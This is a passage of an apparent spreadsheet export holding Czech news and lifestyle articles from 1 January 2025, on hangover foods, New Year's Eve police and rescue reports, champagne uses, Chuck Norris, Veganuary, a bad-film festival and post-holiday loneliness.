zmírňuje pálení žáhy. Banány – jsou snadno stravitelné, dodají potřebné sacharidy, které vyrovnají hladinu cukru v krvi a pomohou zklidnit žaludek. Dále pomohou také vitamíny a minerály jako draslík, hořčík, vápník a fosfor . Tip: využijte kombinace výše zmíněných surovin a na kocovinu si rozmixujte banánovo-mléčný koktejl , který můžete dosladit trochou medu, případně dochutit čerstvými či mraženými borůvkami a ostružinami plnými antioxidantů . Feelkoy / Shutterstock.com Vsaďte na vajíčka, vývary i lák Pokud máte žaludek jako na vodě a moc toho sníst nezvládnete, sáhněte po sucharech , piškotech nebo sušenkách. Zapíjejte je po douškách Coca-Colou. Zvládnete-li posnídat vydatněji, pak zvolte vajíčka bohatá na cystein – aminokyselinu, která pomáhá pročistit játra od toxinu zvaného acetaldehyd. Tuto látku pak najdete i v mléčných výrobcích, česneku nebo kuřecím mase. Pro doplnění elektrolytů, minerálů a dalších tekutin je ideální vývar (klidně čistý), případně kokosová voda , funkční a vitamínové vody nebo také lák z nakládaných okurek. Vše mějte připravené A jedna rada na závěr. S bolehlavem i nevolností počítejte (i když máte v plánu pít „jen trochu“) a nakupte si zásoby dopředu. Polévku mějte uvařenou v lednici, stejně tak připravené džusy, limonády nebo minerálky . Nezapomeňte ani na něco sladkého , ovoce plné fruktózy, případně na různé doplňky stravy pro doplnění potřebných vitamínů. Ať nemusíte den po oslavách řešit shánění chybějících životabudičů a kocovinu co nejdříve a v klidu vyležíte. Zdroje: Kupi.cz, WebMD , Harvard Health Publishing Diskuze Diskutovat jak na to oslava tipy kocovina alkohol Silvestr</t>
  </si>
  <si>
    <t>20250101_327_3694718444_acb3759957aa4bd9086e.html</t>
  </si>
  <si>
    <t>acb3759957aa4bd9086e</t>
  </si>
  <si>
    <t>Rušnou noc měli v Libereckém kraji hlavně záchranáři, do rána 260 událostí</t>
  </si>
  <si>
    <t>Rušnou noc měli v Libereckém kraji hlavně záchranáři, do rána 260 událostí 1. ledna 2025 7:28 , aktualizováno 9:21 Sdílet článek ilustrační snímek | foto: Metro.cz Zatímco policisté a hasiči v Libereckém kraji hodnotí silvestrovské oslavy jako poměrně klidné, záchranáři zažili perný přelom roku. Na silvestra až do dnešního rána se nezastavili, řešili přes 260 událostí, což je zhruba o stovku víc než běžně. O půlnoci jim na dispečinku svítilo číslo 199, to dlouho nikdo nepamatuje, a do rána bylo dalších 65 událostí, řekl krátce po 06:00 na Nový rok ČTK mluvčí Zdravotnické záchranné služby Libereckého kraje Michael Georgiev. "Ošetřili jsme sedm lidí, kteří se zranili při odpalování pyrotechniky, ale také desítky zranění a intoxikací alkoholem , desítky napadení. Záchranáři říkali, že tolik napadení a agrese nepamatují, naštěstí jsme nezaznamenali napadení zdravotníků. Ale většina těch událostí byla spjata s alkoholem," řekl Georgiev. Pokud jde o úrazy pyrotechnikou, i když jich bylo víc než v posledních letech, šlo podle něj naštěstí o lehká zranění. Policie hodnotí silvestrovskou noc jako klidnější. "Od 18:00 31. prosince do dnešních 05:30 jsme na tísňové lince přijali 113 hovorů. Většina z nich se týkala narušování občanského soužití v podobě verbálního ale i fyzického napadání jak na veřejnosti mezi cizími lidmi, tak i v soukromí mezi známými nebo rodinnými příslušníky, převážně jsme tyto případy kvalifikovali jako přestupky " řekla krajská policejní mluvčí Ivana Baláková. Jednu událost řeší podle Balákové policie pro podezření z trestného činu výtržnictví. "Došlo k němu v Novém Městě pod Smrkem , kde skupinka opilců napadla tři mladíky. Ten případ je zatím v počátku," doplnila policejní mluvčí. Tři řidiče přistihli policisté za volantem pod vlivem alkoholu , naměřili jim od 1,1 do 1,5 promile alkoholu v dechu. Policie také v noci pátrala po 57leté ženě z Harrachova , která zhruba hodinu po půlnoci odešla z domova a od té doby se nehlásila. S žádostí o pomoc se podle Balákové na policii obrátil manžel, který zjistil, že žena zmizela z domu. "Vzhledem k mrazivému počasí jsme do pátrání nasadili vrtulník s termovizí, ženu se díky tomu ráno podařilo objevit u Mumlavských vodopádů. Byla podchlazená, předali jsme ji do péče záchranářů," dodala policejní mluvčí. Za poměrně klidnou označili silvestrovskou noc hasiči, od silvestrovských 18:00 do dnešních 06:00 měli zhruba dvě desítky výjezdů, z toho 12 bylo požárů. "Ty požáry byly naštěstí kontejnery a obaly po pyrotechnice. Šlo o takové drobnější požáry většinou beze škody nebo jen se škodou způsobenou na těch kontejnerech. Loni jsme za stejnou dobu evidovali devět požárů, což je nárůst o 25 procent, ale stejně 12 požárů je poměrně klidná noc," dodala mluvčí Hasičského záchranného sboru Libereckého kraje Monika Tóthová. Autor: ČTK Sdílet článek Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20250101_328_3694330878_643403aad719f466c50f.html</t>
  </si>
  <si>
    <t>643403aad719f466c50f</t>
  </si>
  <si>
    <t>Co na vlasy, aby se leskly? Umyjte je šampaňským. „Šáňo" umí zázraky i s koženou obuví a vytuní rizoto</t>
  </si>
  <si>
    <t>Co na vlasy, aby se leskly? Umyjte je šampaňským. „Šáňo" umí zázraky i s koženou obuví a vytuní rizoto Bublinky k poslední noci v roce zkrátka patří, stejně jako přebytky v otevřené a nedopité lahvi, na nichž si druhý den už nikdo nepochutná. Co s nimi? Do dřezu? To v žádném případě! Takové plýtvání. Nedopitá lahev šumivého vína ještě poslouží a chtě nechtě vnese i do té největší všednosti krapet luxusu. Šampaňské dodá vlasům lesk Herečka Catherine Zeta - Jones si oplachuje vlasy pivem v kombinaci s medem. Přísahá, že má kadeře díky tomu krásně lesklé. Také se traduje, že po ginu nebo vodce jsou vlasy až směšně hebké a podle některých tyto lihoviny dokonce napomáhají růstu vlasů. Tak proč si neumýt vlasy šampaňským? Doporučuje to i vlasová influencerka Madina Shrienzada v jednom ze svých videí, kde si pochvaluje výsledný lesk a dodává, že bublinky krotí krepatění. I když to zní bláznivě nebo marnivě, něco na tom je. Šampaňské můžeme najít jako jednu ze složek některých vlasových produktů. Už Diana Vreeland, šéfredaktorka světoznámého módního časopisu, kdysi napsala , že by se po vzoru Francouzů vlasy blonďatého dítěte měly oplachovat v „mrtvém“ šampaňském, aby zůstaly zlaté. Také supermodelka Christie Brinkley si polévá zbytky šampaňského vlasy, aby dosáhla nevídaného lesku. Dejte na nás a schválně to sami vyzkoušejte. Lze to několika způsoby : Umyjte si vlasy šamponem, jak jste zvyklí. Na úplný závěr přelijte svoji hřívu šumivým vínem , opláchněte a je hotovo. Šampaňské lze také včesat do vlhkých vlasů a pomocí prstů ho ještě štědře vmasírovat. Poté důkladně opláchnout. LightField Studios / Shutterstock Šampaňské dodá vlasům lesk a v případě blond vlasů zvýrazní zlatý odstín. Šampaňské zvýrazní zlaté blond tóny a jeho perlivost dodá vlasům objem a lesk. Pro ještě větší výsledný efekt nastříkejte před fénováním šampaňské ke kořínkům vlasů. Hlavně si to užijte. Vždyť vy se můžete v šampaňském rovnou i vykoupat. Už jste slyšeli o vinotherapii ? Díky ní mohou antioxidanty a další látky obsažené v hroznech ozdravit pleť . Překvapivé recepty s bublinkami Kdo si nechce lít šampaňské na hlavu, toho možná okouzlí kouzla v kuchyni. Šampaňské totiž skvěle nahradí v receptech klasické víno . V tomto případě vůbec nevadí, že přišlo o svou perlivost. Pokud vám zbylo opravdu jen trochu, je ideální použít šampaňské do základní salátové zálivky a vyrobit si šampaňský vinaigrette. Prošlehejte v menší míse tyto suroviny: 1 stroužek prolisovaného česneku 1 lžíci nadrobno nakrájené šalotky 1/2 lžičky soli 1/4 lžičky černého pepře 1/4 šálku šampaňského 1/2 šálku olivového oleje Zdroj: Youtube Klasický vinaigrette má ve svém základu citronovou šťávu nebo vinný ocet, který v tomto případě nahrazuje šampaňské. Zálivka je výborná na dochucení salátů i omáček. Dodá jim okázalou chuť. Dokonalé rajčatové rizoto Zbylé bublinky můžete použít také na vytvoření perfektního rajčatového rizota. Šéfkuchař Palak Patel doporučuje osmahnout na kombinaci olivového oleje a másla cibuli a česnek, čímž se vytvoří základ pro rizoto. Pak přidejte rýži arborio a nechte zrnka obalit tukem. A pak přichází chvíle nalít do pánve šumivý nektar! „Zredukujete ho tak, aby zrnka absorbovala jeho chuť. Přidáte rajčatový protlak, osmahnete a pak jako obvykle postupně přiléváte teplý vývar, dokud není rýže hotová,” radí Patel. Existuje ale mnohem víc receptů, kde lze šumivé víno uplatnit. Ať už to jsou ryby, holandská omáčka nebo pečené kuře. TIP pro ty nejlínější: Zbylé šampaňské dejte k ledu, respektive ho nalijte do formičky na led. Šampaňské ledové kostky budou ideální na osvěžení například koktejlu mimosa. Šampaňské neváhejte použít místo krému na boty Říká vám něco jméno Beau Brummell ? Zřejmě ne, ale byl to takový influencer 19. století. Kdyby žil teď, měl by zajisté miliony sledujících. Dával totiž přednost leštění bot šampaňským . Ano! Možná jste někdy zkoušeli nablýskat obuv banánem, ale vsadím se, že šampaňským tedy ještě rozhodně ne. Ti nejstylovější angličtí gentlemani z vyšší společnosti – takzvaní dandies –, byli ztělesněním aristokratického životního stylu. Beau Brummell patřil mezi ně a nedal na metodu leštění bot šampaňským dopustit. Přísahal, že díky ní dosáhnete nejčernějšího odstínu bot. Chcete vkročit do nového roku pravou nohou? Ideální způsob, kde s tím začít. Zdroje: iGlanc.cz , Town &amp;amp; Country , Tasting Table , Business Insider , Hello Magazine , Footwear News Související články sergey kolesnikov / Shutterstock LightField Studios / Shutterstock</t>
  </si>
  <si>
    <t>20290</t>
  </si>
  <si>
    <t>20250101_329_3694378633_3cbc3f922c79c3b9e1ed.html</t>
  </si>
  <si>
    <t>3cbc3f922c79c3b9e1ed</t>
  </si>
  <si>
    <t>Mladík ohrožoval lidi v centru Brna nožem. Jinak šlo o nejklidnější silvestr za poslední roky</t>
  </si>
  <si>
    <t>Mladík ohrožoval lidi v centru Brna nožem. Jinak šlo o nejklidnější silvestr za poslední roky Policisté a brněnští strážníci za sebou mají jedny z nejklidnějších oslav silvestra za poslední roky. Podle mluvčího strážníků Jakuba Ghanema i co do počtu oznámení. Muži a ženy v uniformách však přesto museli zasahovat hned na několika místech v Brně , a to například na Moravském náměstí , kde mladík ohrožoval kolemjdoucí nožem. Do jedné hodiny ranní řešila policie 170 událostí Policisté řešili do jedné hodiny ranní 170 událostí. Práci jim přidělala například žena z Břeclavska, která je podezřelá z trestného činu loupež, protože napadla svého známého a odcizila mu peněženku. „Starší muž skončil se zraněními v nemocnici, podezřelou dohledala a se souhlasem státního zastupce zadržela policejní hlídka,“ uvedl mluvčí policie Pavel Šváb . Ještě před půlnocí nezvládl jzdu na jednokolce v ulici Radlas student, který nedal přednost a střetl se s autobusem. Z nehody však vyvázl pouze se zraněním. „O moc lépe se nevedlo mladému muži, který krátce po půlnoci na Moravském náměstí v Brně ohrožoval kolmjdoucí s nožem v ruce. Skončil v moci policistů a na služebně,“ uvedl Šváb. Podle strážníků šlo o jeden z nejklidnějších silvestrů za poslední roky Činili se také strážníci městské policie. Ti kolem půlnoci vyjížděli ke sporu mezi dvěma klienty, který propukl v azylovém domě v Mlýnské ulici. „Jednačtyřicetiletý muž tam o šest let mladšího údajně opakovaně udeřil pěstí do obličeje. Napadený měl nad levým okem krvácející tržnou ránu, podezřelý byl v pořádku. Ke konfliktu mohla přispět i silná opilost. Domnělý útočník nadýchal přibližně tři promile alkoholu stejně jako svědek incidentu, zraněný muž mírně přes jedno promile. Přivolaní zdravotníci ho ošetřili a odvezli do nemocnice. Státní policisté vyloučili spáchání trestného činu, a strážníci proto případ postoupili do správního řízení,“ popsal mluvčí brněnských strážníků Jakub Ghanem . Krátce před půl druhou zhodnotil mluvčí strážníků, že letošní silvestr se dá hodnotit jako jeden z nejklidnějších za poslední roky, a to i co do počtu oznámení. „Ve městě převládá klid,“ napsal po druhé hodině ranní Ghanem. Autor: Ivo Špisar Autor Ivo Špisar</t>
  </si>
  <si>
    <t>20250101_33_3697693483_005ad5cda2f97cf8277a.html</t>
  </si>
  <si>
    <t>005ad5cda2f97cf8277a</t>
  </si>
  <si>
    <t>Chuck Norris si nepostavil vlastní rodný dům ani nedokáže vykopat díru do vody. Je to vlastně docela obyčejný smrtelník</t>
  </si>
  <si>
    <t>Shrnutí Chuck Norris si nepostavil vlastní rodný dům ani nedokáže vykopat díru do vody. Je to vlastně docela obyčejný smrtelník Publikováno: 1. ledna 2025, 19:30 Doba čtení: více než 5 min Reakce k článku Komentáře K překvapení fanoušků byl jeho život poměrně obyčejný. Narodil se v roce 1940 a jeho otcem byl válečný veterán z druhé světové války. Byl nejstarším ze 3 sourozenců a ve svých pamětech vzpomíná na bratra, který si v dětství předpověděl vlastní smrt. Byl si jistý, že se nedožije 27 let. Trochu nešťastné dítě Náhodný pokus o lepší život vyšel Návrat domů Přátelství s celebritami Ve filmu mu to moc nešlo O první manželství přišel, ale získal dceru Walker, Texas Ranger To se vyplnilo a zemřel ve válce proti Vietnamu . Norrisova rodina se rozpadla dávno předtím. Norrisův otec si válečné trauma léčil alkoholem a rodina ho moc nezajímala. Když neopravoval auta, tak se opíjel na nikdy nekončících flámech. Chuck v té době vůbec v ničem nepřipomínal hrdinu s bojovým duchem. Pití otce přivádělo do rodiny neustálé problémy. Když bylo Chuckovi 16 let, matka už takový život nezvládala, rozvedla se a prchla před otcem svých dětí z Oklahomy do Kalifornie . Trochu nešťastné dítě Chuck byl zakřiknutý a složité dětství se na něm podepsalo. Byl podrážděný, plachý a ve škole naprosto nevýrazný. O sportovním talentu nemohla být řeč. Učil se však dobře a asi měl své plány. Hned po maturitě se oženil se spolužačkou, ale líbánek si neužil. Ve stejné době nastoupil k letectvu a doufal, že pevný řád dá jeho životu smysl. Čekala ho služba na základně Osan v Jižní Koreji . Náhodný pokus o lepší život vyšel Mladík se vzdal svého jména Carlos Ray a přijal novou identitu Chuck . To ale nebyla jediná změna v jeho životě. Zamiloval si tradiční korejské bojové umění zvané Tang Soo Do. To bylo přesně to, co potřeboval. Odhodil plachost a v bojovém umění vynikal. Když zdolal všechny mety tohoto bojového umění, rozhodl se, že se pustí do nového bojového umění, Chun Kuk Do, které vylepší a ukáže světu, co umí jeho pěsti. Chuck Norris (1976) | Zdroj: Alan Light / Creative Commons Attribution 2.0 Návrat domů V roce 1962 mu vypršela smlouva u letectva a s hodností se vrátil domů. Přišel čas na rodinu. Na svět přišel Mike, ze kterého Chuck Norris za pár let udělal dětskou filmovou hvězdu. Norris se snažil najít si stálé zaměstnání, aby uživil rodinu. Založil si vlastní studio bojových umění, ale první rok šlo o zkoušku jeho trpělivosti. Soutěže, kterých se účastnil, aby propagoval své studio, nedopadly zrovna moc dobře a Norris v karate prohrával. Teprve následující rok, kdy svůj styl zdokonalil, pocítil, co je to opravdový úspěch. Na jednom z turnajů dokázal v jeden den porazit 7 soupeřů. Konečně se mohl utkat se svým největším soupeřem Joe Lewisem a vrátit mu porážku. Přátelství s celebritami Vítězství za vítězstvím z něj udělalo hvězdu a v jeho škole se začaly objevovat hvězdy jako Steve McQueen , Bob Barker nebo Priscilla Presley . V roce 1968 už byl šampionem karate ve střední váze. Titul si udržel šest let. Škola bojových umění už ho nenaplňovala a začal uvažovat o další cestě. K té mu pomohl přítel, kterým nebyl nikdo jiný než Bruce Lee . Ve škole, kde byl obklopený hvězdami akčních filmů, bylo jen otázkou času, kdy sám zkusí herecké štěstí. Bruce Lee byl tak ohromen Norrisovým mistrovstvím v bojových uměních, že dostal bláznivý nápad: Chuck Norris by měl být hvězdou akčních filmů. Lee, v té době již legenda bojových umění, požádal Norrise , aby si zahrál hlavního záporáka v jeho připravovaném filmu The Way of the Dragon (Cesta draka). Jejich filmový souboj byl legendární a zabral téměř čtvrtinu scénáře. A některé rány, které proběhly během natáčení, nebyly jen předstírané. Film slíbil divákům něco, co v reálném životě nikdy neuvidí: rvačku mezi dvěma nejikoničtějšími postavami karate na světě. Ale podle Norrise byl skutečný boj mezi dvěma přáteli předem jasný. Norris pokorně přiznal, že Leeho nikdy nemůže porazit ve férovém boji. Chuck Norris , The Delta Force 1986 | Zdroj: Yoni S.Hamenahem / Creative Commons Attribution-Share Alike 3.0 Ve filmu mu to moc nešlo Nicméně ho měly čekat další okamžiky zklamání, které mu svět filmu nadělil. Moc nechybělo, aby ponížený šampion svou hereckou dráhu vzdal. Naštěstí měl věrného žáka a fanouška. Steve McQueen viděl, že Norris má potenciál, a podařilo se mu přimět Norrise, aby začal chodit na kurzy herectví na MGM . Ukázalo se, že to byla správná rada ve správný čas. Nejprve si zkusil zahrát (a nejen bojovat) ve filmech natáčených pro Hongkong a čekal na svou příležitost. Když dlouho nepřicházela a studia neměla zájem, udělal si svůj film. Hodně zariskoval, když do něj investoval milion dolarů, pronajímal si sám kinosály a prodával vstupenky. Good Guys Wear Black (Správní chlapi nosí černou) nakonec vydělal 18 milionů dolarů. Do té doby se v Americe promítaly kung-fu filmy natočené hlavně v Honkongu a jedinou známou hvězdou byl Bruce Lee . Tedy až do okamžiku, kdy si Norris dokázal zajistit pozornost. V roce 1973 se na jeden Norrisův film přišel podívat nenápadný chlapec, který byl velkým fanouškem kung-fu filmů. A tak Keanu Reeves našel svůj vzor! K začínající filmové slávě nesmrtelného Norrise patří i historka, kdy během natáčení filmu v exteriérech narušoval natáčení gang motorkářů a hvězda bojových umění si dokázala velice snadno zjednat respekt. Úplně jiné to bylo, když ve filmech došlo na natáčení ve společnosti žen. Tam jeho chování drsňáka zmizelo a nebezpečný bojovník nevěděl, co dělat. O první manželství přišel, ale získal dceru Život filmové hvězdy nebyl jen zalitý sluncem. Jeho první láska se s ním nakonec rozvedla a při natáčeni Delta Force 2 se musel vyrovnat se smrtí 4 přátel, kteří během natáčení zahynuli při špatném manévru helikoptéry v rokli. Musel se také vyrovnat s velkým překvapením, když se mu ozvala jeho dcera. Ta jednou zaslechla rozhovor své matky s přítelem a rozhodla se i přes nelibost matky otce vyhledat. A Norris se zachoval čestně a svou dceru přijal, aniž by potřeboval důkazy. Moc dobře si na krátký románek pamatoval. Související článek Kvíz: Walker, Texas Ranger proslavil zejména Chuck Norris . Nemusíte ale patřit mezi jeho fanoušky,… Kdo by si nevzpomněl na seržanta Cordella Walkera, jakmile se řekne Walker, Texas Ranger? Společně se svým parťákem Jimmym řeší náročné případy… Walker, Texas Ranger Jeho životní role Walker, Texas Ranger měla nenápadný začátek ve „spaghetti westernu“, a tak vznikl nápad na seriál. Zajímavé je, že herec původně váhal, zda má roli vzít. Nebyl si jistý, zda mu spíše neuškodí. Nakonec se nechal přemluvit a seriálovou postavu vyladil k dokonalosti (a to včetně vousů). Fanoušky bavily hlavně zákulisní drby z natáčení, které tvrdily, že některé bojové scény nebyly hrané. A to ještě milý Chuck Norris netušil, jaká nesmrtelná sláva ho čeká. Všechno to začalo nápadem Iana Spectora, který začal formou satiry sepisovat zaručená fakta o nezničitelném mistru bojových umění… Den, kdy se narodil Chuck Norris , se nazývá stvoření světa. Chuck Norris chytil koronavirus. Bylo mu ho líto, tak ho zase pustil. Chuck Norris dokáže přestřihnout kabel od wi-fi. Chucka Norrise uštkla kobra královská. Po 5 dnech ve velkých bolestech umřela. Chuck Norris rozbrečí cibuli. Reakce k článku Autor: Lída Kropáčková Autor person Lída Kropáčková</t>
  </si>
  <si>
    <t>20250101_330_3694290802_e2a5d6a91fdc0f778dcb.html</t>
  </si>
  <si>
    <t>e2a5d6a91fdc0f778dcb</t>
  </si>
  <si>
    <t>Denní výběr: Kuřáci a pijáci alkoholu si od ledna výrazně připlatí. Opět roste spotřební daň</t>
  </si>
  <si>
    <t>20250101_331_3694290801_1674999ad2e787124281.html</t>
  </si>
  <si>
    <t>1674999ad2e787124281</t>
  </si>
  <si>
    <t>20250101_332_3694283958_4c77602ae2ef5f36e59e.html</t>
  </si>
  <si>
    <t>4c77602ae2ef5f36e59e</t>
  </si>
  <si>
    <t>To maso vypadá fakt divně - nová kampaň Veganuary zpochybňuje zavedené (ne)pořádky</t>
  </si>
  <si>
    <t>To maso vypadá fakt divně - nová kampaň Veganuary zpochybňuje zavedené (ne)pořádky Veganuary je organizace, která povzbuzuje a podporuje lidi, aby na měsíc leden odstranili ze svých talířů živočišné produkty. V roce 2024, více než deset let po svém založení, iniciativa oznámila svůj dosud nejlepší rok s 1,8 milionem přihlášených členů po celém světě. V roce 2025 se má opět rozrůst o nové země, jako jsou Peru , Malajsie a Kanada . A s pomocí nové kampaně „Weird“ neboli „Divné“ organizace doufá, že se jí podaří inspirovat více lidí než kdy dříve. Nová kampaň Veganuary je jedinečná; nezaměřuje se pouze na zdravotní a ekologické výhody rostlinné stravy. Místo toho komunikuje zdůraznění „podivnosti“ konzumace živočišných produktů. „Většina z nás považuje jídlo, na kterém jsme vyrostli, za 'normální', ale když se zastavíme a zamyslíme se nad postupy, které se skrývají za mnoha známými potravinami, začnou nám připadat trochu divné,“ říká Toni Vernelli, vedoucí mezinárodní politiky a komunikace Veganuary. Nová „divná“ kampaň Veganuary Nová kampaň Veganuary je již v plném proudu a reklamy běží na sociálních sítích, kromě toho poběží také na streamovací platformě ITVX, kterou provozuje jedna z předních britských televizních stanic ITV. Každá z reklam se řídí podobným tématem: otázka „Divné?“ je zobrazena spolu s podněcujícími a drásajícími obrázky. Například prase s klobásou místo těla má podle Veganuary zdůraznit, že „klobásy jsou doslova prasata nacpaná do vlastních střev“. Plát steaku na talíři s hořícím lesem zase sděluje, že „chov zvířat je hlavní příčinou odlesňování“. Hrnek s potiskem krávy, z jehož horní části vystupují vemena, představuje realitu mlékárenského průmyslu („krávy vyrábějí mléko, aby nakrmily své děti, stejně jako to dělají naše matky,“ stojí v textu). Kuře, které má na těle povlak připomínající nugetku, nese text: „Kuřata pocházejí z ptáků vyšlechtěných tak rychle, že často sotva stojí na nohou. Je divné pomyslet na utrpení, které se skrývá za tímto křupavým trojobalem?“. Myšlenkou kampaně je zpochybnit společenskou podmíněnost konzumace živočišných produktů. Většina lidí se označuje za milovníky zvířat (téměř 90 milionů Američanů například sdílí domácnost s nějakým zvířecím společníkem), a přesto maso jedí. Je to proto, že většinou nevidíme zvířata na stísněných, industrializovaných, znečišťujících továrních farmách, kde je 99 procent z nich chováno pro potravinářský průmysl, ale vidíme maso nebo mléčné výrobky zabalené v plastu v supermarketu nebo v obchodě s potravinami. Kvůli tomu se společnost vyhýbá spojování jednoho s druhým. A nalijme si čistého vína , kdo z vás byl kdy na jatkách? Rostoucí úspěch Veganuary V současnosti dochází na celém světě k posunu. Více lidí než kdy jindy se v zájmu svého zdraví nebo zdraví planety rozhoduje snížit spotřebu masa, ne-li ho úplně vyřadit. Například údaje z roku 2023 ukázaly, že ve Velké Británii byla jeho konzumace nejnižší od začátku záznamů v 70. letech 20. století. Veganské dny jsou jednou z iniciativ, které pomohly zvýšit povědomí o výhodách odklonu od živočišných produktů. Iniciativa byla založena v roce 2013, ale skutečnou dynamiku začala nabírat v roce 2017, kdy se k výzvě vyzkoušet si na jeden měsíc rostlinnou stravu přihlásilo 50 000 lidí. Do roku 2023 se toto číslo vyšplhalo na téměř 707 000 lidí po celém světě. V roce 2024 se počet zvýšil na téměř dva miliony. Tento výrazný nárůst byl částečně způsoben novým způsobem měření účasti. Dříve se počítaly pouze registrace do e-mailu , ale v roce 2024 se rozhodl zahrnout i čísla z formátů, jako je obsah na sociálních sítích a prodej kuchařek. Veganuary má působivou úspěšnost; jeho následný průzkum v roce 2023 například ukázal, že 80 procent účastníků snížilo příjem potravin živočišného původu o 50 % nebo více. Kromě toho 28 procent účastníků uvedlo, že se rozhodlo zůstat na 100 % rostlinné stravy. Veganuary ale neláká jen lidi. Do kampaně se zapojilo i několik restauračních řetězců zavedením bezmasých menu. Například populární celosvětový řetězec restaurací Hard Rock Cafe přidal v roce 2024 nové veganské menu. Zdroj: VegNews.com 1 / 3 Autor: Redakce || Redakce | foto: se svolením Veganuary | 1. leden 2025 Rubrika transition_slide Future food</t>
  </si>
  <si>
    <t>699</t>
  </si>
  <si>
    <t>712</t>
  </si>
  <si>
    <t>20250101_333_3694214569_ed7e43ce7d1769dec729.html</t>
  </si>
  <si>
    <t>ed7e43ce7d1769dec729</t>
  </si>
  <si>
    <t>20250101_334_3694220771_1c37b35fa932559d73d8.html</t>
  </si>
  <si>
    <t>1c37b35fa932559d73d8</t>
  </si>
  <si>
    <t>Festival Naruby se postará o ty nejhorší filmové zážitky všech dob</t>
  </si>
  <si>
    <t>Festival Naruby se postará o ty nejhorší filmové zážitky všech dob Většina z nás chodí do kina na dlouho očekávané filmy, od kterých si slibuje strhující podívanou. Účastníci festivalu Naruby chodí do kina na přehlídku těch nejhorších filmů, které byly za posledních 50 let natočené. Před týdnem Koncept festivalu Naruby je vlastně jednoduchý. Diváci se prokáží platným lístkem a v šesti různých promítacích sálech se „trápí“ sledováním těch nejhorších béčkových filmů, jaké se tvůrcům podařilo objevit. Netradiční filmový zážitek – Zdroj: Shutterstock.com Špatné filmy, dobrý rum Aby byl filmový zážitek o něco snesitelnější, každý divák k filmu dostane podnos s degustací 4 vysoce kvalitních rumů. Objednat si ale můžete klidně pivo nebo víno či si zakoupit jen samotný lístek. Během promítání pak diváky signalizační semafor upozorní pokaždé, když má nastat obzvlášť nepovedená scéna, a vyzve je k dalšímu doušku alkoholu . Pokud zakoupený alkohol nestačí, další si lze přímo ze sálu online doobjednat. Obsluha přinese další várku přímo k divákovi. V nabídce je i nealkoholický rum Vassa Zero. Areál bývalého kláštera Celý festival se koná v areálu Gabriel Loci a kromě promítání filmů se návštěvníci mohou těšit na bohatý doprovodný program sestávající z koncertů, divadelních představení a stand-up vystoupení. Samozřejmostí jsou stánky s občerstvením a speciální rumový stánek s míchanými koktejly. Do budoucna se chystá také vytvoření tematické únikové hry, díky které diváci prozkoumají celý rozsáhlý areál. Míchaný drink přijde k chuti – Zdroj: Shutterstock.com Samotný areál není pro filmové nadšence ničím novým. Bývalý klášter sv. Gabriela na Praze 5 už v minulosti posloužil filmařům k natáčení. Točily se zde filmy jako Šakalí léta, Po strništi bos nebo Mission Impossible: Ghost Protocol. Festival navazuje na mateřské kino Balt , které se v Praze stalo tak trochu legendou. Toto malé rodinné kino začalo nejen cíleně promítat špatné filmy, ale zároveň divákům nabízet alkoholické občerstvení, možnost donesení vlastních nápojů i možnost vzít si s sebou do kinosálu svého psa. Zdroje: https://filmfestnaruby.cz/o-festivalu/ https://cc.cz/the-room-rum-i-jirka-kara-festival-naruby-laka-na-luxus-na-smichove-pitevnu-i-nejhorsi-film-sveta/ https://www.totalfilm.cz/2023/05/nejhorsi-filmy-dobry-rum-cervnu-vypukne-festival-naruby/ Autor: Tereza Čierníková Autor person Tereza Čierníková</t>
  </si>
  <si>
    <t>503</t>
  </si>
  <si>
    <t>20250101_335_3694225462_3ba4513da206f71c55ec.html</t>
  </si>
  <si>
    <t>3ba4513da206f71c55ec</t>
  </si>
  <si>
    <t>Mojmír (33): Každý rok mám novoroční splín. Všechno po hektických setkáních utichne a já zažívám pocit prázdnoty</t>
  </si>
  <si>
    <t>Mojmír (33): Každý rok mám novoroční splín. Všechno po hektických setkáních utichne a já zažívám pocit prázdnoty Mojmír odjakživa nesnáší období po Novém roce, připadá si osamělý. Po extrémech, kdy se během adventu vídal s mnoha lidmi nastává „mrtvý čas“. Zjistil, že původem jeho pocitů mohou být zážitky z dětství. Tentokrát se rozhodl zahnat splín pořádnou prací. Všichni se chtějí družit během prosince, rychle se sejít, slavit a veselit se. Jenže v lednu nastává extrém, kdy se zase neděje vůbec nic a já to nenesu už od dětství dobře. V lednu ztrácím ambice do života a rozhodl jsem se s tím tentokrát něco udělat. Mohlo by Vás zajímat: Renata (32): Máma utápí smutek v nakupování. Z bytu už má skladiště, ale nedokáže přestat Připadám si úplně vyšťavený Jsem člověk, co nemá moc v lásce změny, to je pravda. Není pro mě ani jednoduché účastnit se mnoha adventních akcí. Pracuji ale ve školství a prosinec je celý o spoustě sešlostech. Většinou se nějak přizpůsobím, faktem je, že pomáhá dobrý svařáček. Pak následují rodinné srazy a skoro každý rok jezdím s přáteli na Silvestra lyžovat. Jestli pak něco nesnáším, je to Nový rok a dny, co následují poté. Připadám si vyšťavený , bez života i elánu. Nic nemá smysl, veškerá moje předsevzetí se mi zdají směšná a ubohá. Najednou jsem děsivě osamělý a to i v dobách, kdy mám přítelkyni. Zkrátka je to pro mě nejhorší období v roce. Vím, jak je Nový rok ve městě smutný. Vítr rozhází nepořádek kolem popelnic, někteří lidé už vyhazují vánoční stromky a na ulicích je pusto a prázdno. Pokaždé si uvědomím, jak je život krátký a jak jsem nicotný. Pokud je to možné, vyvenčím jen psa a pak zalézám do postele a je mi bídně. Mohlo by Vás zajímat: Robert (43): Manželka sdílí život celé rodiny na sociálních sítích. Dověděl jsem se tak i to, že ze mě má deprese Zašel jsem kvůli tomu jednou k psychologovi Jak léta plynou, strach z toho tísnivého období na mě přichází už o něco dřív. Snažil jsem se na to nemyslet, ale ty prudké změny se mnou hodně cloumají. Jeden měsíc mám denně nějakou společenskou událost, schůzku nebo setkání. Další měsíc po mně neštěkne ani pes, nikdo nemá čas a každý ho tráví jen s nejbližšími, nebo v úzkém rodinném kruhu. " Nešel bys na pivo?" volám všem kamarádům. "Promiň, jsem po svátcích grogy, odpočívám s rodinou," zní obvyklá odpověď. Přestože jsem zkusil zůstat u rodičů i po Novém roce, lépe mi nebylo, takže tím to nebude. Zašel jsem jednou k psychologovi a po pár sezeních jsme se dobrali k zajímavému výsledku. Díky vyprávění o dětství jsem si vzpomněl, že mě rodiče nechávali na Nový rok samotného. Vánoce probíhaly tradičně s rodinou , ale na Silvestra už jsem byl u babičky. Ta chodila spát v osm večer a druhý den obvykle poklízela. Byl jsem sám a zřejmě jsem si to dával nějakým způsobem za vinu. Pak jsem na vše zapomněl a zpětně mi to ani nepřipadá tak dramatické. Mohlo by Vás zajímat: Jitka (31): Po porodu jsem 